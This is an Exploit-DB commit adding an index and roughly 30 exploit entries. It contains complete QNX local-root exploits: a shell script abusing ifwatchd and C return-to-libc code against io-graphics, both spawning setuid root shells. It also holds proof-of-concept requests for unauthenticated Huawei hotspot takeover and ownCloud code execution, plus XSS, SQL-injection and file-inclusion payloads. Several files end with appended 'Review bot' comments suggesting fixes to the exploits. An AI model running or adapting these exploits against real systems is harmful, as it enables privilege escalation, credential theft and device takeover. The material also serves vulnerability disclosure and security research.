Updated 03_12_2014

Offensive Security 2014-03-12 04:28:49 +00:00
parent cf9a24defe
commit 356156bb8c
30 changed files with 1283 additions and 0 deletions


@ -28931,3 +28931,32 @@ id,file,description,date,author,platform,type,port
32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 'connector.php' Local File Include Vulnerability",2008-08-04,"Sina Yazdanmehr",php,webapps,0
32151,platforms/asp/webapps/32151.pl,"Pcshey Portal 'kategori.asp' SQL Injection Vulnerability",2008-08-04,U238,asp,webapps,0
32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0
32153,platforms/qnx/local/32153.sh,"QNX 6.4.x/6.5.x ifwatchd - Local root Exploit",2014-03-10,cenobyte,qnx,local,0
32154,platforms/qnx/local/32154.c,"QNX 6.5.0 x86 io-graphics - Local root Exploit",2014-03-10,cenobyte,qnx,local,0
32155,platforms/qnx/local/32155.c,"QNX 6.5.0 x86 phfont - Local root Exploit",2014-03-10,cenobyte,qnx,local,0
32156,platforms/qnx/local/32156.txt,"QNX 6.4.x/6.5.x pppoectl - Information Disclosure",2014-03-10,cenobyte,qnx,local,0
32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0
32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80
32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x, 4.5.x (upload.php, filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80
32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,metasploit,windows,remote,30000
32164,platforms/windows/remote/32164.rb,"HP Data Protector Backup Client Service Remote Code Execution",2014-03-10,metasploit,windows,remote,5555
32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0
32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0
32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 Host Header Internet Filter Security Bypass Vulnerability",2008-08-05,nnposter,multiple,remote,0
32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0
32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 'livehelp_js.php' Cross-Site Scripting Vulnerability",2008-08-05,CoRSaNTuRK,php,webapps,0
32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery index.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery images.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32172,platforms/php/webapps/32172.txt,"Softbiz Image Gallery suggest_image.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32173,platforms/php/webapps/32173.txt,"Softbiz Image Gallery image_desc.php latest Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32174,platforms/php/webapps/32174.txt,"Softbiz Image Gallery adminhome.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32175,platforms/php/webapps/32175.txt,"Softbiz Image Gallery config.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32176,platforms/php/webapps/32176.txt,"Softbiz Image Gallery changepassword.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32177,platforms/php/webapps/32177.txt,"Softbiz Image Gallery cleanup.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery browsecats.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32179,platforms/php/webapps/32179.txt,"POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability",2008-08-05,"Rohit Bansal",php,webapps,0
32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 'index.php' Multiple Local File Include Vulnerabilities",2008-08-06,casper41,php,webapps,0
32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0
32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0
32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0


20
platforms/asp/webapps/32157.txt Executable file

@ -0,0 +1,20 @@
# Exploit Title: Kentico CMS User Enumeration Bug
# Google Dork: inurl:/CMSPages/logon.aspx <-- enumerates several Kentico
CMS sites
# Date: 02-25-2014
# Exploit Author: Charlie Campbell and Lyndon Mendoza
# Vendor Homepage: http://www.kentico.com/
# Software Link: http://www.kentico.com/Download-Demo/Trial-Version
# Version: [Version 7.0.75 and previous versions]
This vulnerability is an unprotected page on the site where you can view
all current users and usernames.
To find out if a Kentico CMS is vulnerable go to
http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
assuming that the Kentico CMS was installed to the root folder in the
server.
I have already notified the authors and security team for Kentico CMS, in
their response they claimed they would issue a patch on 02-21-2014.
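Review bot: The wrapped continuation `CMS sites` on the line after the `# Google Dork:` field falls outside the `#` header comment, so the exploit-db header block is broken at that point; it should be joined back onto the Google Dork line. The entry also never states a fixed version: the body says the vendor planned a patch for 02-21-2014, but the Version field only reads `[Version 7.0.75 and previous versions]`, so a reader cannot tell whether 7.0.75 itself received the fix. A short line after the Version field recording the patched release, or that none was confirmed at publication, would make the status explicit for administrators.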


@ -0,0 +1,180 @@
SEC Consult Vulnerability Lab Security Advisory < 20140307-0 >
=======================================================================
title: Unauthenticated access & manipulation of settings
product: Huawei E5331 MiFi mobile hotspot
vulnerable version: Software version 21.344.11.00.414
fixed version: Software version 21.344.27.00.414
impact: High
homepage: http://www.huawei.com
found: 2013-12-06
by: J. Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a
multi-mode wireless terminal for SOHO (Small Office and Home Office) and
business professionals.
You can connect the E5331 with the USB interface of a computer, or connect the
E5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM
network, you can surf the Internet and send/receive messages/emails
cordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile
users can experience many new features and services with the E5331. These
features and services will enable a large number of users to use the E5331 and
the average revenue per user (ARPU) of operators will increase substantially."
source:
http://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272&directoryId=5009&treeId=3619&tab=0
Business recommendation:
------------------------
All discovered vulnerabilities can be exploited without authentication and
therefore pose a high security risk.
The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the device. It is assumed that further
vulnerabilities exist within this product!
The recommendation of SEC Consult is to perform follow-up security tests of
this device and similar devices.
Vulnerability overview/description:
-----------------------------------
Unauhenticated attackers are able to gain access to sensitive configuration
(e.g. WLAN passwords in clear text or IMEI information of the SIM card) and
even manipulate all settings in the web administration interface! This also
works when the "Enable firewall" feature is set in "Firewall Switch" settings
of the web interface.
This can even be exploited remotely via Internet depending on the mobile
operator setup. E.g. if the operator allows incoming connections for mobile
networks, the web interface would be accessible and exploitable publicly.
Otherwise those settings can be manipulated via CSRF attacks too. The DNS name
"mobilewifi.home" can be used regardless of the IP address settings.
Proof of concept:
-----------------
An attacker simply needs to access certain URLs of the web interface in order
to receive the configuration. No authentication is needed!
URL for retrieving wireless passwords / PSK in clear text:
http://mobilewifi.home/api/wlan/security-settings
XML response:
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>NONE</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>AES</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>XXXXX</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>
Further interesting URLs to retrieve information from (not complete):
http://mobilewifi.home/api/wlan/wps (WPS pin)
http://mobilewifi.home/api/security/dmz (DMZ host settings)
http://mobilewifi.home/api/pin/simlock (enable SIM lock)
http://mobilewifi.home/api/wlan/host-list (connected wireless clients)
http://mobilewifi.home/api/device/information (IMEI, MAC, etc)
[...]
In order to change settings it is also simply possible to issue POST requests
to the specific URLs. E.g. change the "DMZ Settings" in order to make internal
clients (client IP addresses can be retrieved through the host-list from above)
reachable from the outside:
POST /api/security/dmz HTTP/1.1
Host: mobilewifi.home
<?xml version="1.0"
encoding="UTF-8"?><request><DmzStatus>1</DmzStatus><DmzIPAddress>A.B.C.D</DmzIPAddress></request>
All those requests can either be issued via CSRF or also from the Internet, if
the web interface of the device is reachable (depends on the mobile operator
settings).
Vulnerable / tested versions:
-----------------------------
The following version of the device has been tested which was the latest
version available at the time of identification of the flaw (the automatic
update feature did not supply any new version):
Software version: 21.344.11.00.414
Web UI version: 11.001.07.00.03
Vendor contact timeline:
------------------------
2013-12-11: Contacting vendor through psirt@huawei.com
2013-12-12: Reply from vendor
2013-12-18: Vendor requests some further details, sending answer
2014-01-09: Vendor: problem will be resolved in new firmware version
2014-01-14: Patch is planned for 6th March 2014
2014-03-07: SEC Consult releases coordinated security advisory
Solution:
---------
According to the vendor the following firmware release fixes the identified
problems:
* Software version 21.344.27.00.414
It contains the following improvements according to the vendor:
1. Users cannot obtain or set any device parameter without logging in.
2. Added server-side authentication to discard illegitimate packets.
The firmware can be downloaded from here:
http://consumer.huawei.com/en/support/downloads/index.htm
The item is called: E5331Update_21.344.27.00.414.B757
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF J. Greil / @2014


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30535/info
XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
XAMPP 1.6.7 for Linux is vulnerable; other versions may also be affected.
http://www.example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30535/info
XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
XAMPP 1.6.7 for Linux is vulnerable; other versions may also be affected.
http://www.example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.alert)</script>


@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/30541/info
8e6 Technologies R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block. This could aid in further attacks.
R3000 Internet Filter 2.0.12.10 is vulnerable; other versions may also be affected.
The following example requests are available:
GET / HTTP/1.0
X-DecoyHost: www.allowed.org
Host: www.blocked.org
GET / HTTP/1.0
X-Decoy: Host: www.allowed.org
Host: www.blocked.org


@ -0,0 +1,70 @@
Vulnerability title: Remote Code Execution in ownCloud
CVE: CVE-2014-2044
Vendor: ownCloud
Product: ownCloud
Affected version: 4.0.x & 4.5.x
Fixed version: 5.0
Reported by: Alejo Murillo Moya
Details:
A remote code execution has been found and confirmed within ownCloud as
an authenticated user. A successful attack could allow an authenticated
attacker to execute PHP code, which could lead to a full compromise of
the server and associated infrastructure. Please note that only the
Windows versions of ownCloud are affected and that valid credentials are
required.
It is possible to create a custom .htaccess into the user's folder on
Windows version of the application, which will enable PHP execution on
the folder. This vulnerability exists because it is possible to bypass
the internal blacklists using Windows ADS (Alternate Data Streams).
Proof Of Concept:
POST /owncloud_5.0.14a/owncloud/?app=files&getfile=ajax%2Fupload.php HTTP/1.1
[...]
Content-Type: multipart/form-data; boundary=---------------------------21191376031994875607185408411
Requesttoken: None
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="MAX_FILE_SIZE"
536870912
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="requesttoken"
None
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="dir"
/
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="files[]"; filename=".htaccess::$DATA"
Content-Type: text/plain
<PUT YOUR TEXT HERE>
-----------------------------21191376031994875607185408411--
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
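Review bot: The proof-of-concept request targets `/owncloud_5.0.14a/owncloud/?app=files&getfile=ajax%2Fupload.php`, while the header lists 4.0.x and 4.5.x as affected and 5.0 as fixed; either the path is a leftover from a different test install or the affected range is wider than stated, and the entry should say which. The files.csv row for 32162 repeats only the `4.0.x, 4.5.x` range, so whatever the answer is, the index inherits the same ambiguity. Since the advisory itself notes that only Windows installs are affected, a one-line clarification of which build the PoC was reproduced against would let readers scope the risk correctly.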

22
platforms/php/webapps/32168.txt Executable file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/30542/info
Pluck is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pluck 4.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/data/inc/footer.php?lang_footer=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?pluck_version=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_install22=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?titelkop=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop1=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop2=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_modules=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop4=[Cross Site Scripting]
http://www.example.com/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?titelkop=[Cross Site Scripting]
http://www.example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting]
http://www.example.com/data/inc/header2.php?titelkop=[Cross Site Scripting]
http://www.example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30543/info
Crafty Syntax Live Help (CSLH) is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/help/livehelp_js.php?department=<script>alert(1)</script>


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?latest=[XSS]
http://www.example.com/index.php?msg=[XSS]


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/images.php?latest=[XSS]
http://www.example.com/images.php?msg=[XSS]


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/suggest_image.php?latest=[XSS]
http://www.example.com/suggest_image.php?msg=[XSS]


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/image_desc.php?latest=[XSS]
http://www.example.com/image_desc.php?msg=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/adminhome.php?msg=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/config.php?msg=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/changepassword.php?msg=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/cleanup.php?msg=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/browsecats.php?msg=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30558/info
POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/s03.php?shopid=s03&cur=eur&sp=de&ag='[SQL]

10
platforms/php/webapps/32180.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30564/info
The Contact module for Chupix CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Contact 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/index.php?module=[LFI]
http://www.example.com/path/admin/index.php?module=[LFI]

11
platforms/php/webapps/32181.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30565/info
Battle.net Clan Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Battle.net Clan Script 1.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30566/info
phpKF-Portal is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
phpKF-Portal 1.10 is vulnerable; other versions may also be affected.
http://www.example.com/path/baslik.php?tema_dizin=../%00LocalFile]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30566/info
phpKF-Portal is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
phpKF-Portal 1.10 is vulnerable; other versions may also be affected.
http://www.example.com/path/anket_yonetim.php?portal_ayarlarportal_dili=../%00LocalFile]

65
platforms/qnx/local/32153.sh Executable file

@ -0,0 +1,65 @@
#!/bin/sh
#
# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# Setuid root ifwatchd watches for addresses added to or deleted from network
# interfaces and calls up/down scripts for them. Any user can launch ifwatchd
# and provide arbitrary up/down scripts. Unfortunately ifwatchd does not drop
# privileges when executing user supplied scripts.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
#
# - exploit description:
# This exploit creates a fake arrival-script which will be executed as root by
# passing it to the -A parameter of /sbin/ifwatchd. The fake arrival-script
# copies /bin/sh to /tmp/shell and makes it setuid root. Once the setuid shell
# is in place ifwatchd will be killed to drop the user into the root shell.
#
# - example:
# $ uname -a
# QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
# $ id
# uid=100(user) gid=100
# $ ./qnx-ifwatchd.sh
# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
#
# [-] creating fake arrival-script
# [-] executing ifwatchd, please wait
# Killed
# [-] now executing suid shell
# # id
# uid=100(user) gid=100 euid=0(root)
PATH=/bin:/usr/bin:/sbin
if [ ! -x /sbin/ifwatchd ]; then
echo "error: cannot execute /sbin/ifwatchd"
exit 1
fi
echo "QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013"
echo
echo "[-] creating fake arrival-script"
cat << _EOF_ > /tmp/0
#!/bin/sh
PATH=/bin:/usr/bin
IFWPID=\$(ps -edaf | grep "ifwatchd -A" | awk '!/grep/ { print \$2 }')
cp /bin/sh /tmp/shell
chown root:root /tmp/shell
chmod 4755 /tmp/shell
rm -f /tmp/0
kill -9 \$IFWPID
exit 0
_EOF_
chmod +x /tmp/0
echo "[-] executing ifwatchd, please wait"
ifwatchd -A /tmp/0 -v lo0 2>&1 >/dev/null
echo "[-] now executing suid shell"
/tmp/shell
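Review bot: The redirection on the `ifwatchd -A /tmp/0 -v lo0 2>&1 >/dev/null` line is ordered so that `2>&1` is applied while stdout is still the terminal and only stdout is then discarded, so ifwatchd's stderr still reaches the user; if the intent was to silence both streams the idiomatic form is `>/dev/null 2>&1`. The header comment lists vulnerable platforms but gives no mitigation, which is the part an administrator reading this entry actually needs; a line such as `# - mitigation: clear the setuid bit on /sbin/ifwatchd (chmod u-s) until a fixed release is installed` would close that gap. For detection, the header could also note that a successful run leaves a setuid-root copy of /bin/sh at /tmp/shell, which is a simple file-integrity indicator.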

143
platforms/qnx/local/32154.c Executable file

@ -0,0 +1,143 @@
/*
* QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013
* <vincitamorpatriae@gmail.com>
*
* - vulnerability description:
* Setuid root /usr/photon/bin/io-graphics on QNX is prone to a buffer overflow.
* The vulnerability is due to insufficent bounds checking of the PHOTON2_HOME
* environment variable.
*
* - vulnerable platforms:
* QNX 6.5.0SP1
* QNX 6.5.0
* QNX 6.4.1
*
* - not vulnerable:
* QNX 6.3.0
*
* - exploit information:
* This is a return-to-libc exploit that yields euid=0. The addresses of
* system() and exit() are retrieved from libc using dlsym().
*
* The address of /bin/sh is retrieved by searching from address 0xb0300000.
*
* - example:
* $ uname -a
* QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
* $ id
* uid=100(user) gid=100
* $ ./qnx-io-graphics
* QNX io-graphics 6.5.0 x86 local root exploit by cenobyte 2013
* [-] system(): 0xb031bd80
* [-] exit(): 0xb032b5f0
* [-] /bin/sh: 0xb0374412
* # id
* uid=100(user) gid=100 euid=0(root)
*
*/
#include <dlfcn.h>
#include <err.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define VULN "PHOTON2_PATH="
static void fail(void);
static void checknull(unsigned int addr);
static unsigned int find_string(char *s);
static unsigned int find_libc(char *syscall);
void
checknull(unsigned int addr)
{
if (!(addr & 0xff) || \
!(addr & 0xff00) || \
!(addr & 0xff0000) || \
!(addr & 0xff000000))
errx(1, "return-to-libc failed: " \
"0x%x contains a null byte", addr);
}
void
fail(void)
{
printf("\n");
errx(1, "return-to-libc failed");
}
unsigned int
find_string(char *string)
{
unsigned int i;
char *a;
printf("[-] %s: ", string);
signal(SIGSEGV, fail);
for (i = 0xb0300000; i < 0xdeadbeef; i++) {
a = i;
if (strcmp(a, string) != 0)
continue;
printf("0x%x\n", i);
checknull(i);
return(i);
}
return(1);
}
unsigned int
find_libc(char *syscall)
{
void *s;
unsigned int syscall_addr;
if (!(s = dlopen(NULL, RTLD_LAZY)))
errx(1, "error: dlopen() failed");
if (!(syscall_addr = (unsigned int)dlsym(s, syscall)))
errx(1, "error: dlsym() %s", syscall);
printf("[-] %s(): 0x%x\n", syscall, syscall_addr);
checknull(syscall_addr);
return(syscall_addr);
return(1);
}
int
main()
{
unsigned int offset = 429;
unsigned int system_addr;
unsigned int exit_addr;
unsigned int binsh_addr;
char env[440];
char *prog[] = { "/usr/photon/bin/io-graphics", "io-graphics", NULL };
char *envp[] = { env, NULL };
printf("QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013\n\n");
system_addr = find_libc("system");
exit_addr = find_libc("exit");
binsh_addr = find_string("/bin/sh");
memset(env, 0xEB, sizeof(env));
memcpy(env, VULN, strlen(VULN));
memcpy(env + offset, (char *)&system_addr, 4);
memcpy(env + offset + 4, (char *)&exit_addr, 4);
memcpy(env + offset + 8, (char *)&binsh_addr, 4);
execve(prog[0], prog, envp);
return(0);
}
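Review bot: The header comment says the overflow is triggered through the `PHOTON2_HOME` environment variable, but the payload is built from `#define VULN "PHOTON2_PATH="`, so the documented trigger and the code disagree and anyone writing a hardening or detection rule from the comment would watch the wrong variable; one of the two names should be corrected. The same mismatch is present in 32155.c, whose header names `PHOTON_HOME` while its macro is `#define VULN "PHOTON_PATH="`. In `find_string`, `signal(SIGSEGV, fail)` installs a `void fail(void)` where a `void (*)(int)` handler is expected, and `a = i;` converts an integer to `char *` without a cast — both compile only with warnings. `find_libc` ends with an unreachable `return(1);` after `return(syscall_addr);`, which should simply be dropped.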

193
platforms/qnx/local/32155.c Executable file

@ -0,0 +1,193 @@
/*
* QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013
* <vincitamorpatriae@gmail.com>
*
* - vulnerability description:
* Setuid root /usr/photon/bin/phfont on QNX is prone to a buffer overflow.
* The vulnerability is due to insufficent bounds checking of the PHOTON_HOME
* environment variable.
*
* - vulnerable platforms:
* QNX 6.5.0SP1
* QNX 6.5.0
* QNX 6.4.1
*
* - not vulnerable:
* QNX 6.3.0
* QNX 6.2.0
*
* - exploit information:
* This is a return-to-libc exploit that yields euid=0. The addresses of
* system() and exit() are retrieved from libc using dlsym().
*
* During development of this exploit I ran into tty issues after succesfully
* overwriting the EIP and launching /bin/sh. The following message appeared:
*
* No controlling tty (open /dev/tty: No such device or address)
*
* The shell became unusable and required a kill -9 to exit. To get around that
* I had modify the exploit to create a shell script named /tmp/sh which copies
* /bin/sh to /tmp/shell and then performs a chmod +s on /tmp/shell.
*
* During execution of the exploit the argument of system() will be set to sh,
